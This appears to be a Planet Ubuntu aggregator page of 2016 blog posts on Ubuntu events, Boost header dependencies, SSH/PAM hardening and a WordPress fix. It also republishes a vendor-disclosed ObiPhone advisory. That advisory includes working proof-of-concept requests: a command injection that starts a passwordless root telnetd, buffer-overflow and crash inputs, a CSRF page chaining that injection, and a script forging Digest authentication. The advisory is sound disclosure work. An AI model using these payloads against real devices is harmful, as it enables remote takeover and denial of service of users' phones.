August 23, 2016

Razer Hardware on Linux

Aaron Honeycutt

One of the things that stopped me from moving to Ubuntu Linux full time on my desktop was the lack of support for my Razer Blackwidow Chroma. For those who do not know about it: pretty link. It is a very pretty keyboard with every key programmable to be a different color or effect. I found a super cool program on GitHub to make it work on Ubuntu/Linux Mint, Debian and possibly a few others, since the source is available here: source link

Here is what the application looks like:
[Screenshot: the Polychromatic application]

It even has a tray applet for quickly changing colors and effects.

on August 23, 2016 08:40 PM

Webinar: Industry 4.0 & IoT

Ubuntu Insights

Webinar 3 - CloudPlugs

We’ll be hosting our next webinar on Industry 4.0 and IoT!

This webinar will explore the convergence of operational and information technology as one of the key benefits of the Internet of Things, and how to use this convergence to build a new generation of integrated digital supply chains, which form the basis of Industry 4.0.

The webinar will cover the following topics:

  • Industry 4.0 and IoT Trends
  • Higher efficiency and productivity through end-to-end integrated digital supply chains
  • New business opportunities for all players in the manufacturing supply chain
  • Real-life examples of industrial process improvements through the use of IoT

Sign up here

About the speaker: Jimmy Garcia-Meza is the co-founder and CEO of CloudPlugs Inc. He has over 20 years of experience running startups and large divisions in private and public U.S. multinational companies. He co-founded nubisio, Inc., a cloud storage company acquired by Bain Capital. He was CEO of FilesX, a backup software company acquired by IBM. He held various executive positions at Silicon Image (SIMG), where he was responsible for driving the worldwide adoption of HDMI. He was a venture director at Index Ventures and held several executive positions at Sun Microsystems, where he was in charge of a $1.7B global line of business.

on August 23, 2016 03:38 PM

M10 Travel Light winners!

Ubuntu Insights


We had an awesome selection of entries for our #TravelLight competition!

Given that the M10 tablet can also be your laptop, saving you 1.5kg compared to the average laptop, we asked you…

What would you take with you on holiday if you had 1.5kg of extra space in your luggage?

Thank you to all who participated; we had a laugh reading the entries! It wasn’t easy, but we narrowed down our winners to the following:

Primary winners (Prize: M10 Tablet)

Gabriel Lucas

Andrea Souviron

Other winners (Prize: Strauss bluetooth speaker)

Adnan Quaium

Zakaria Bouzid

Bouslikhin saad

Johnny Chin

Bruce Cozine

Learn about the M10

on August 23, 2016 03:19 PM

Well, hello there, people. I am back with another Bacon Roundup which summarizes some of the various things I have published recently. Don’t forget to subscribe to get the latest posts right to your inbox.

Also, don’t forget that I am doing a Reddit AMA (Ask Me Anything) on Tues 30th August 2016 at 9am Pacific. Find out the details here.

Without further ado, the roundup:

Building a Career in Open Source (opensource.com)
A piece I wrote about how to build a successful career in open source. It delves into finding opportunity, building a network, always learning/evolving, and more. If you aspire to work in open source, be sure to check it out.

Cutting the Cord With Playstation Vue (jonobacon.org)
At home we recently severed ties with DirecTV (for lots of reasons, this being one), and moved our entertainment to a Playstation 4 and Playstation Vue for TV. Here’s how I did it, how it works, and how you can get in on the action.

Running a Hackathon for Security Hackers (jonobacon.org)
I have recently been working with HackerOne, and we ran a hackathon for some of the best hackers in the world to hack popular products and services for fun and profit. Here’s what happened, how it looked, and what went down.

Opening Up Data Science with data.world (jonobacon.org)
I have also been working with data.world, who are building a global platform and community for data, collaboration, and insights. This piece delves into the importance of data, the potential for data.world, and what the future might hold for a true data community.

From The Archive

To round out this roundup, here are a few pieces I published from the archive. As usual, you can find more here.

Using behavioral patterns to build awesome communities (opensource.com)
Human beings are pretty irrational a lot of the time, but irrational in predictable ways. These traits can provide a helpful foundation on which to build human systems and communities. This piece delves into some practical ways in which you can harness behavioral economics in your community or organization.

Atom: My New Favorite Code Editor (jonobacon.org)
Atom is an extensible text editor that provides a thin and sleek core and a raft of community-developed plugins for expanding it into the editor you want. Want it like vim? No worries. Want it like Eclipse? No worries. Here’s my piece on why it is neat and recommendations for which plugins you should install.

Ultimate unconference survival guide (opensource.com)
Unconferences, for those who are new to them, are conferences in which the attendees define the content on the fly. They provide a phenomenal way to bring fresh ideas to the surface. They can, though, be a little complicated for attendees to figure out. Here are some tips on getting the most out of them.

Stay up to date and get the latest posts direct to your email inbox with no spam and no nonsense. Click here to subscribe.

The post Bacon Roundup – 23rd August 2016 appeared first on Jono Bacon.

on August 23, 2016 01:48 PM

August 22, 2016

Ubuntu in Philadelphia

Elizabeth K. Joseph

Last week I traveled to Philadelphia to spend some time with friends and speak at FOSSCON. While I was there, I noticed a Philadelphia area Linux Users Group (PLUG) meeting would land during that week and decided to propose a talk on Ubuntu 16.04.

But first I happened to be out getting my nails done with a friend on Sunday before my talk. Since I was there, I decided to Ubuntu theme things up again. Drawing freehand, the manicurist gave me some lovely Ubuntu logos.

Girly nails aside, that’s how I ended up at The ATS Group on Monday evening for a PLUG West meeting. They had a very nice welcome sign for the group. Danita and I arrived shortly after 7PM for the Q&A portion of the meeting. This pre-presentation time gave me the opportunity to pass around my BQ Aquaris M10 tablet running Ubuntu. After the first unceremonious pass, I sent it around a second time with more of an introduction, and the Bluetooth keyboard and mouse combo so people could see convergence in action by switching between the tablet and desktop view. Unlike my previous presentations, I was traveling so I didn’t have my bag of laptops and extra tablet, so that was the extent of the demos.

The meeting was very well attended and the talk went well. It was nice to have folks chiming in on a few of the topics (like the transition to systemd) and there were good questions. I was also able to give away a copy of The Official Ubuntu Book, 9th Edition to an attendee who was new to Ubuntu.

Keith C. Perry shared a video of the talk on G+ here. Slides are similar to past talks, but I added a couple since I was presenting on a Xubuntu system (rather than Ubuntu) and didn’t have pure Ubuntu demos available: slides (7.6M PDF, lots of screenshots).

After the meeting we all had an enjoyable time at The Office, which I hadn’t been to since moving away from Philadelphia almost seven years ago.

Thanks again to everyone who came out, it was nice to meet a few new folks and catch up with a bunch of people I haven’t seen in several years.

Saturday was FOSSCON! The Ubuntu Pennsylvania LoCo team showed up to have a booth, staffed by long time LoCo member Randy Gold.

They had Ubuntu demos, giveaways from the Ubuntu conference pack (lanyards, USB sticks, pins) and I dropped off a copy of the Ubuntu book for people to browse, along with some discount coupons for folks who wanted to buy it. My Ubuntu tablet also spent time at the table so people could play around with that.


Thanks to Randy for the booth photo!

At the conference closing, we had three Ubuntu books to raffle off! They seemed to go to people who appreciated them, and since both José and I attended the conference, the raffle winners had two of the book’s three authors there to sign their copies.


My co-author, José Antonio Rey, signing a copy of our book!
on August 22, 2016 07:53 PM

Note that this is a duplicate of the advisory sent to the full-disclosure mailing list.

Introduction

Multiple vulnerabilities were discovered in the web management interface of the ObiHai ObiPhone products. The vulnerabilities were discovered during a black-box security assessment, and therefore the list should not be considered exhaustive.

Affected Devices and Versions

ObiPhone 1032/1062 with firmware versions earlier than 5-0-0-3497.

Vulnerability Overview

Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length

Vulnerability Details

Obi-1. Memory corruption leading to free() of an attacker-controlled address

By providing a long URI (longer than 256 bytes) not containing a slash in a request, a pointer is overwritten which is later passed to free(). By controlling the location of the pointer, this would allow an attacker to affect control flow and gain control of the application. Note that the free() seems to occur during cleanup of the request, as a 404 is returned to the user before the segmentation fault.

python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479d8b18 in free () from root/lib/libc.so.6
#1  0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 <free+48>:        ldr     r3, [r0, #-4]
   0x479d8b1c <free+52>:        sub     r5, r0, #8
   0x479d8b20 <free+56>:        tst     r3, #2
   0x479d8b24 <free+60>:        bne     0x479d8bec <free+260>
   0x479d8b28 <free+64>:        tst     r3, #4
(gdb) i r r0
r0             0x41     65

Obi-2. Command injection in WiFi Config

An authenticated user (including the lower-privileged “user” user) can enter a hidden network name similar to “$(/usr/sbin/telnetd &)”, which starts the telnet daemon.

GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]

Note that telnetd is now running and accessible via user “root” with no password.

Obi-3. Denial of Service due to buffer overflow

By providing a long URI (longer than 256 bytes) beginning with a slash, memory is overwritten beyond the end of mapped memory, leading to a crash. Though no exploitable behavior was observed, it is believed that memory containing information relevant to the request or control flow is likely overwritten in the process. strcpy() appears to write past the end of the stack for the current thread, but it does not appear that there are saved link registers on the stack for the devices under test.

python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479dc440 in strcpy () from root/lib/libc.so.6
#1  0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
   0x479dc44c <strcspn>:        push    {r4, r5, r6, lr}
   0x479dc450 <strcspn+4>:      ldrb    r3, [r0]
(gdb) i r r1 r2
r1             0xb434df01       3023363841
r2             0xff     255
(gdb) p/x $r1+$r2
$1 = 0xb434e000

Obi-4. Buffer overflow in internal socket handler

Commands to be executed by the realtime backend process obid are sent via Unix domain sockets from obiapp. In formatting the message for the Unix socket, a new string is constructed on the stack. This string can overflow the static buffer, leading to control of program flow. The only vectors leading to this code that were discovered during the assessment were authenticated; however, unauthenticated code paths may exist. Note that the example command can be executed as the lower-privileged “user” user.

GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]

(gdb) 
#0  0x41414140 in ?? ()
#1  0x0006dc78 in ?? ()

Obi-5. Cross-site request forgery

All portions of the web interface appear to lack any protection against Cross-Site Request Forgery. Combined with the command injection vector in ObiPhone-3, this would allow a remote attacker to execute arbitrary shell commands on the phone, provided the current browser session was logged in to the phone.
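
As an illustration only (this is not from the advisory), a page like the one generated below could combine CSRF with the command injection above; PHONE-IP is a placeholder for the device address, and the payload simply reuses the earlier telnetd example.

# Hypothetical proof-of-concept page. A victim's browser that is logged in to the
# phone and loads this page would send the authenticated GET request on their behalf.
cat > csrf-poc.html <<'EOF'
<html><body>
  <img src="http://PHONE-IP/wifi?checkssid=$(/usr/sbin/telnetd%20%26)" alt="">
</body></html>
EOF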

Obi-6. Failure to implement RFC 2617 correctly

RFC 2617 specifies HTTP Digest authentication, but the ObiPhone does not implement it correctly. The HTTP digest authentication fails to comply in the following ways:

  • The URI is not validated
  • The application does not verify that the nonce received is the one it sent
  • The application does not verify that the nc value does not repeat or go backwards

    GET / HTTP/1.1
    Host: foo
    Authorization: Digest username="admin", realm="a", nonce="a", uri="/", algorithm=MD5, response="309091eb609a937358a848ff817b231c", opaque="", qop=auth, nc=00000001, cnonce="a"
    Connection: close

    HTTP/1.1 200 OK
    Server: OBi110
    Cache-Control: must-revalidate, no-store, no-cache
    Content-Type: text/html
    Content-Length: 1108
    Connection: close

Please note that the realm, nonce, cnonce, and nc values have all been chosen and the response generated offline.
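
For reference, a response like the one above can be computed entirely offline with standard tools. The following is just a sketch of the RFC 2617 calculation for qop=auth with placeholder credentials (it is not part of the original advisory); because the device never verifies that the nonce is one it issued, a value computed this way is accepted.

# Placeholder credentials; nothing from the server is needed to build the response.
USER=admin; PASS=admin; REALM=a; NONCE=a; NC=00000001; CNONCE=a; QOP=auth
HA1=$(printf '%s:%s:%s' "$USER" "$REALM" "$PASS" | md5sum | cut -d' ' -f1)
HA2=$(printf 'GET:/' | md5sum | cut -d' ' -f1)
# The final MD5 is the value placed in the response="..." field.
printf '%s:%s:%s:%s:%s:%s' "$HA1" "$NONCE" "$NC" "$CNONCE" "$QOP" "$HA2" | md5sum | cut -d' ' -f1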

Obi-7. Invalid pointer dereference due to invalid header

Sending an invalid HTTP Authorization header, such as “Authorization: foo”, causes the program to attempt to read from an invalid memory address, leading to a segmentation fault and reboot of the device. This requires no authentication, only access to the network to which the device is connected.

GET / HTTP/1.1
Host: foo
Authorization: foo

This causes the server to dereference the address 0xFFFFFFFF, presumably returned as a -1 error code.

(gdb) bt
#0  0x479dc438 in strcpy () from root/lib/libc.so.6
#1  0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 <strcpy+8>:       ldrb    r3, [r1, #1]!
   0x479dc43c <strcpy+12>:      cmp     r3, #0
   0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
(gdb) i r r1
r1             0xffffffff       4294967295

Obi-8. Null pointer dereference due to malicious URL

If the /obihai-xml handler is requested without any trailing slash or component, this leads to a null pointer dereference, crash, and subsequent reboot of the phone. This requires no authentication, only access to the network to which the device is connected.

GET /obihai-xml HTTP/1.1
Host: foo

(gdb) bt
#0  0x479dc7f4 in strlen () from root/lib/libc.so.6
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
pc = 0x479dc7f4 in strlen; saved pc = 0x171830
Outermost frame: Cannot access memory at address 0x8f6
Arglist at 0xbef1aa50, args: 
Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 <strlen+4>:       ldr     r2, [r1], #4
   0x479dc7f8 <strlen+8>:       ands    r3, r0, #3
   0x479dc7fc <strlen+12>:      rsb     r0, r3, #0
   0x479dc800 <strlen+16>:      beq     0x479dc818 <strlen+40>
   0x479dc804 <strlen+20>:      orr     r2, r2, #255    ; 0xff
(gdb) i r r1
r1             0x0      0

Obi-9. Denial of service due to invalid content-length

Content-Length headers of -1, -2, or -3 result in a crash and device reboot. This does not appear exploitable to gain execution. Larger (more negative) values return a page stating “Firmware Update Failed”, though it does not appear that any attempt was made to update the firmware with the posted data.

POST / HTTP/1.1
Host: foo
Content-Length: -1

Foo

This appears to write a constant value of 0 to an address controlled by the Content-Length parameter, but since it appears to be relative to a freshly mapped page of memory (perhaps via mmap() or malloc()), it does not appear this can be used to gain control of the application.

(gdb) bt
#0  0x00138250 in HTTPD_msg_proc ()
#1  0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 <HTTPD_msg_proc+396>:       strb    r1, [r3, r2]
  0x138254 <HTTPD_msg_proc+400>:       ldr     r1, [r4, #24]
  0x138258 <HTTPD_msg_proc+404>:       ldr     r0, [r4, #88]   ; 0x58
  0x13825c <HTTPD_msg_proc+408>:       bl      0x135a98
  0x138260 <HTTPD_msg_proc+412>:       ldr     r0, [r4, #88]   ; 0x58
(gdb) i r r3 r2
r3             0xafcc7000       2949410816
r2             0xffffffff       4294967295

Mitigation

Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.

Author

The issues were discovered by David Tomaschik of the Google Security Team.

Timeline

  • 2016/05/12 - Reported to ObiHai
  • 2016/05/12 - Findings Acknowledged by ObiHai
  • 2016/05/20 - ObiHai reports working on patches for most issues
  • 2016/06/?? - New Firmware posted to ObiHai Website
  • 2016/08/18 - Public Disclosure
on August 22, 2016 07:00 AM

A few weeks ago, I hacked up go-wmata, some golang bindings to the WMATA API. This is super handy if you are in the DC area, and want to interface to the WMATA data.

As a proof of concept, I wrote a yo bot called @WMATA, where it returns the closest station if you Yo it your location. For hilarity, feel free to Yo it from outside DC.

For added fun, and puns, I wrote a dbus proxy for the API as well, at wmata-dbus, so you can query the next train over dbus. One thought was to make a GNOME Shell extension to tell me when the next train is. I’d love help with this (or pointers on how to learn how to do this right).

on August 22, 2016 02:16 AM

August 21, 2016

Recently I generated diagrams showing the header dependencies between Boost libraries, or rather, between various Boost git repositories. Diagrams showing dependencies for each individual Boost git repo are here along with dot files for generating the images.

The monster diagram is here:

Edges and Incidental Modules and Packages

The directed edges in the graphs represent that a header file in one repository #includes a header file in the other repository. The idea is that, if a packager wants to package up a Boost repo, they can’t assume anything about how the user will use it. A user of Boost.ICL can choose whether ICL will use Boost.Container or not by manipulating the ICL_USE_BOOST_MOVE_IMPLEMENTATION preprocessor macro. So, the packager has to list Boost.Container as some kind of dependency of Boost.ICL, so that when the package manager downloads the boost-icl package, the boost-container package is automatically downloaded too. The dependency relationship might be a ‘suggests’ or ‘recommends’, but the edge will nonetheless exist somehow.

In practice, packagers do not split Boost into packages like that. At least for Debian packages, they split compiled static libraries into packages such as libboost-serialization1.58, and put all the headers (all header-only libraries) into a single package, libboost1.58-dev. Perhaps the reason packagers put it all together is that there is little value in splitting the header-only repositories in monolithic Boost from each other if they will all be packaged together anyway. Or perhaps the sheer number of repositories makes splitting impractical. This is in contrast to KDE Frameworks, which does consider such edges and dependency graph size when determining where functionality belongs. Typically KDE aims to define the core functionality of a library on its own in a loosely coupled way with few dependencies, and then add integration and extension for other types in higher level libraries (if at all).

Another feature of my diagrams is that repositories which depend circularly on each other are grouped together in what I called ‘incidental modules’. The name is inspired by ‘incidental data structures’ which Sean Parent describes in detail in one of his ‘Better Code’ talks. From a packager point of view, the Boost.MPL repo and the Boost.Utility repo are indivisible because at least one header of each repo includes at least one header of the other. That is, even if packagers wanted to split Boost headers in some way, the ‘incidental modules’ would still have to be grouped together into larger packages.

As far as I am aware such circular dependencies don’t fit with Standard C++ Modules designs or the design of Clang Modules, but that part of C++ would have to become more widespread before Boost would consider their impact. There may be no reason to attempt to break these ‘incidental modules’ apart if all that would do is make some graphs nicer, and it wouldn’t affect how Boost is packaged.

My script for generating the dependency information is simply grepping through the include/ directory of each repository and recording the #included files in other repositories. This means that while we know Boost.Hana can be used stand-alone, if a packager simply packages up the include/boost/hana directory, the result will have dependencies on parts of Boost because Hana includes code for integration with existing Boost code.
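
The script itself is not reproduced here, but the idea is roughly the sketch below. It treats the first path component after boost/ in an #include directive as the owning repository, which is an approximation (and this is not the actual script used for the diagrams).

# For each repo under libs/, list the boost/<component> names its headers #include.
cd ~/dev/src/boost/libs
for repo in */; do
  [ -d "$repo/include" ] || continue
  grep -rhoE '#[[:space:]]*include[[:space:]]*[<"]boost/[^/>".]+' "$repo/include" \
    | sed -E 's@.*boost/@@' | sort -u \
    | sed "s@^@${repo%/} -> @"
done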

Dependency Analysis and Reduction

One way of defining a Boost library is to consider the group of headers which are gathered together and documented together to be a library (there are other ways, which some in Boost prefer – it is surprisingly fuzzy). That is useful for documentation at least, but as shown above it appears not to be useful from a packaging point of view. So, are these diagrams useful for anything?

While Boost header-only libraries are not generally split in standard packaging systems, the bcp tool is provided to allow users to extract a subset of the entire Boost distribution into a user-specified location. As far as I know, the tool scans header files for #include directives (ignoring ifdefs, like a packager would) and gathers together all of the transitively required files. That means that these diagrams are a good measure of how much stuff the bcp tool will extract.

Note also that these edges do not contribute time to your slow build – reducing edges in the graphs by moving files won’t make anything faster. Rewriting the implementation of certain things might, but that is not what we are talking about here.

I can run the tool to generate a usable Boost.ICL which I can easily distribute. I delete the docs, examples and tests from the ICL directory because they make up a large chunk of the size. Such a ‘subset distribution’ doesn’t need any of those. I also remove 3.5M of preprocessed files from MPL. I then need to define BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS when compiling, which is easy and explained at the end:

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
15M     myicl/

Ok, so it’s pretty big. Looking at the dependency diagram for Boost.ICL you can see an arrow to the ‘incidental spirit’ module. Looking at the Boost.Spirit dependency diagram you can see that it is quite large.

Why does ICL depend on ‘incidental spirit’? Can that dependency be removed?

For those ‘incidental modules’, I selected one of the repositories within the group and named the group after that one repository. To see why ICL depends on ‘incidental spirit’, we have to examine all 5 of the repositories in the group to check which one is responsible for the dependency edge.

boost/libs/icl$ git grep -Pl -e include --and \
  -e "thread|spirit|pool|serial|date_time" include/
include/boost/icl/gregorian.hpp
include/boost/icl/ptime.hpp

Formatting wide terminal output is tricky in a blog post, so I had to make some compromises in the output here. Those ICL headers are including Boost.DateTime headers.

I can further see that gregorian.hpp and ptime.hpp are ‘leaf’ files in this analysis. Other files in ICL do not include them.

boost/libs/icl$ git grep -l gregorian include/
include/boost/icl/gregorian.hpp
boost/libs/icl$ git grep -l ptime include/
include/boost/icl/ptime.hpp

As it happens, my ICL-using code also does not need those files. I’m only using icl::interval_set<double> and icl::interval_map<double>. So, I can simply delete those files.

boost/libs/icl$ git grep -l -e include \
  --and -e date_time include/boost/icl/ | xargs rm
boost/libs/icl$

and run the bcp tool again.

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
12M     myicl/

I’ve saved 3M just by understanding the dependencies a bit. Not bad!

Most of the size difference is accounted for by no longer extracting boost::mpl::vector, and secondly by the Boost.DateTime headers themselves.

The dependencies in the graph are now so few that we can consider each one, ask why it is there, and whether it can be removed. For example, there is a dependency on the Boost.Container repository. Why is that?

include/boost/icl$ git grep -C2 -e include \
   --and -e boost/container
#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/map.hpp>
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <map>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>

So, Boost.Container is only included if the user defines ICL_USE_BOOST_MOVE_IMPLEMENTATION, and otherwise not. If we were talking about C++ code here we might consider this a violation of the Interface Segregation Principle, but we are not, and unfortunately the realities of the preprocessor mean this kind of thing is quite common.

I know that I’m not defining that and I don’t need Boost.Container, so I can hack the code to remove those includes, eg:

index 6f3c851..cf22b91 100644
--- a/include/boost/icl/map.hpp
+++ b/include/boost/icl/map.hpp
@@ -12,12 +12,4 @@ Copyright (c) 2007-2011:
 
-#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
-#   include <boost/container/map.hpp>
-#   include <boost/container/set.hpp>
-#elif defined(ICL_USE_STD_IMPLEMENTATION)
 #   include <map>
 #   include <set>
-#else // Default for implementing containers
-#   include <map>
-#   include <set>
-#endif

This and following steps don’t affect the filesystem size of the result. However, we can continue to analyze the dependency graph.

I can break apart the ‘incidental fusion’ module by deleting the iterator/zip_iterator.hpp file, removing further dependencies in my custom Boost.ICL distribution. I can also delete the iterator/function_input_iterator.hpp file to remove the dependency on Boost.FunctionTypes. The result is a graph which you can at least reason about being used in an interval tree library like Boost.ICL, quite apart from our starting point with that library.

You might shudder at the thought of deleting zip_iterator if it is an essential tool to you. Partly I want to explore in this blog post what will be needed from Boost in the future when we have zip views from the Ranges TS or use the existing ranges-v3 directly, for example. In that context, zip_iterator can go.

Another feature of the bcp tool is that it can scan a set of source files and copy only the Boost headers that are included transitively. If I had used that, I wouldn’t need to delete the ptime.hpp or gregorian.hpp etc because bcp wouldn’t find them in the first place. It would still find the Boost.Container etc includes which appear in the ICL repository however.

In this blog post, I showed an alternative approach to the bcp --scan attempt at minimalism. My attempt is to use bcp to export useful and as-complete-as-possible libraries. I don’t have a lot of experience with bcp, but it seems that in scanning mode I would have to re-run the tool any time I used an ICL header which I had not used before. With the modular approach, it would be less-frequently necessary to run the tool (only when directly using a Boost repository I hadn’t used before), so it seemed an approach worth exploring the limitations of.

Examining Proposed Standard Libraries

We can also examine other Boost repositories, particularly those which are being standardized by newer C++ standards because we know that any, variant and filesystem can be implemented with only standard C++ features and without Boost.

Looking at Boost.Variant, it seems that use of the Boost.Math library makes that graph much larger. If we want Boost.Variant without all of that Math stuff, one thing we can choose to do is copy the one math function that Variant uses, static_lcm, into the Variant library (or somewhere like Boost.Core or Boost.Integer for example). That does cause a significant reduction in the dependency graph.

Further, I can remove the hash_variant.hpp file to remove the Boost.Functional dependency:

I don’t know if C++ standardized variant has similar hashing functionality or how it is implemented, but it is interesting to me how it affects the graph.

Using a bcp-extracted library with Modern CMake

After extracting a library or set of libraries with bcp, you might want to use the code in a CMake project. Here is the modern way to do that:

add_library(boost_mpl INTERFACE)
target_compile_definitions(boost_mpl INTERFACE
    BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS
)
target_include_directories(boost_mpl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl"
)

add_library(boost_icl INTERFACE)
target_link_libraries(boost_icl INTERFACE boost_mpl)
target_include_directories(boost_icl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl/libs/icl/include"
)
add_library(boost::icl ALIAS boost_icl)

Boost ships a large chunk of preprocessed headers for various compilers, which I mentioned above. The reasons for that are probably historical and obsolete, but the preprocessed headers will remain, they are used by default when using GCC, and that will not change. To diverge from that default it is necessary to set the BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS preprocessor macro.

By defining an INTERFACE boost_mpl library and setting its INTERFACE target_compile_definitions, any user of that library gets that magic BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS define when compiling its sources.

MPL is just an internal implementation detail of ICL though, so I won’t have any of my CMake targets using MPL directly. Instead I additionally define a boost_icl INTERFACE library which specifies an INTERFACE dependency on boost_mpl with target_link_libraries.

The last ‘modern’ step is to define an ALIAS library. The alias name is boost::icl and it aliases the boost_icl library. To CMake, the following two commands generate an equivalent buildsystem:

target_link_libraries(myexe boost_icl)
target_link_libraries(myexe boost::icl)

Using the ALIAS version has a different effect however: If the boost::icl target does not exist an error will be issued at CMake time. That is not the case with the boost_icl version. It makes sense to use target_link_libraries with targets with :: in the name and ALIAS makes that possible for any library.


on August 21, 2016 08:48 PM

If you are someone who likes using WordPress and you run into this little issue (Abort Class-pclzip.php : Missing Zlib) while importing a slider with Revolution Slider, don’t worry; the fix is as follows:

  1. Edit the file inside the wp-admin/includes/ folder: sudo nano /path-to-your-site/wp-admin/includes/class-pclzip.php
  2. Find the line if (!function_exists('gzopen')) and replace gzopen with gzopen64.

With that small change you can keep using the plugin without any problem.

Now, why does this error occur? In recent Ubuntu releases, gzopen (the PHP function that lets us open a .gz compressed file) is only provided as its 64-bit variant, which is why you need to replace gzopen with gzopen64 so that you can import all those files compressed in this format.
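
If you prefer to apply the change from the command line, something like the following should work; it keeps a backup, and the path is only an example, so adjust it to where your site lives.

# Replace every standalone gzopen reference with gzopen64 (a .bak copy is kept).
sed -i.bak 's/\bgzopen\b/gzopen64/g' /path-to-your-site/wp-admin/includes/class-pclzip.php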

Happy Hacking!


on August 21, 2016 05:37 PM

Help a friend?

Valorie Zimmerman

Hello, if you are reading this and have some extra money, consider helping out a young friend of mine whose mother needs a better defense attorney.

In India, where they live, the resources all seem stacked against her. I've tried to help, and hope you will too.

Himanshu says: Hi, I recently started an online crowdfunding campaign to help raise legal funds for my mother, who is in the middle of a divorce and domestic violence case.

 https://www.ketto.org/mother

Please support and share this message. Thanks.
on August 21, 2016 07:55 AM

I was setting up some wargame boxes for a private group and wanted to reduce the risk of malfeasance/abuse from these boxes. One option, used by many public wargames, is locking down the firewall. While that’s a great start, I decided to go one step further and prevent directly logging in as the wargame users, requiring that the users of my private wargames have their own accounts.

Step 1: Setup the Private Accounts

This is pretty straightforward: create a group for these users that can SSH directly in, create their accounts, and setup their public keys.

# groupadd sshusers
# useradd -G sshusers matir
# su - matir
$ mkdir -p .ssh
$ echo 'AAA...' > .ssh/authorized_keys

Step 2: Configure PAM

This will set up PAM to define who can log in from where. Edit /etc/security/access.conf to look like this:

# /etc/security/access.conf
+ : (sshusers) : ALL
+ : ALL : 127.0.0.0/24
- : ALL : ALL

This allows sshusers to log in from anywhere, and everyone to log in locally. This way, users allowed via SSH log in, then port forward from their machine to the wargame server to connect as a level.

Edit /etc/pam.d/sshd to use this by uncommenting (or adding) a line:

account  required     pam_access.so nodefgroup

Step 3: Configure SSHD

Now we’ll configure SSHD to allow access as needed: passwords locally, keys only from remote hosts, and make sure we use PAM. Ensure the following settings are set:

UsePAM yes

Match Host !127.0.0.0/24
  PasswordAuthentication no

Step 4: Test

Restart sshd and you should be able to connect remotely as any user in sshusers, but not as any other user. You should also be able to set up a port forward and then connect with a username/password through the forwarded port, as sketched below.
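
For example, assuming the wargame host is wargames.example.com and the level accounts allow password logins, a player could do something like this (the host name, local port and account names are placeholders):

# Forward a local port to the wargame server's own sshd over the key-authenticated session.
ssh -f -N -L 2222:localhost:22 matir@wargames.example.com
# Connecting through the forward arrives from 127.0.0.1 on the server, so the
# pam_access rule and the sshd Match block allow password authentication.
ssh -p 2222 level1@localhost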

on August 21, 2016 07:00 AM

August 18, 2016



Thanks to the Ubuntu Community Fund, I'm able to fly to Berlin and attend, and volunteer too. Thanks so much, Ubuntu community for backing me, and to the KDE e.V. and KDE community for creating and running Akademy.

This year, Akademy is part of QtCon, which should be exciting. Lots of our friends will be there, from KDAB, VLC, Qt and FSFE. And of course Kubuntu will do our annual face-to-face meeting, with as many of us as can get to Berlin. It should be hot, exhausting, exciting, fun, and hard work, all rolled together in one of the world's great cities.

Today we got the news that Canonical has become a KDE e.V. Patron. This is most welcome news, as the better the cooperation between distributions and KDE, the better software we all have. This comes soon after SuSE's continuing support was affirmed on the growing list of Patrons.

Freedom and generosity is what it's all about!
on August 18, 2016 11:17 PM

I’ve made some changes to the Plasma 5.8 release schedule. We had a request from our friends at openSUSE to bring the release forward by a couple of weeks so they could sneak it into their release and everyone could enjoy the LTS goodness. As openSUSE are long-term supporters of and contributors to KDE, as well as patrons of KDE, the Plasma team chatted and decided to slide the dates around to help out. The release is now on the first Tuesday in October.

 

on August 18, 2016 09:14 PM

Akademy is this year at QtCon along with FSF-E, Qt, VLC and others.

I booked a flat on AirBNB near to the Akademy location and there’s still a bed or two left available.

Wed Aug 31 CHECK IN 2:00 PM

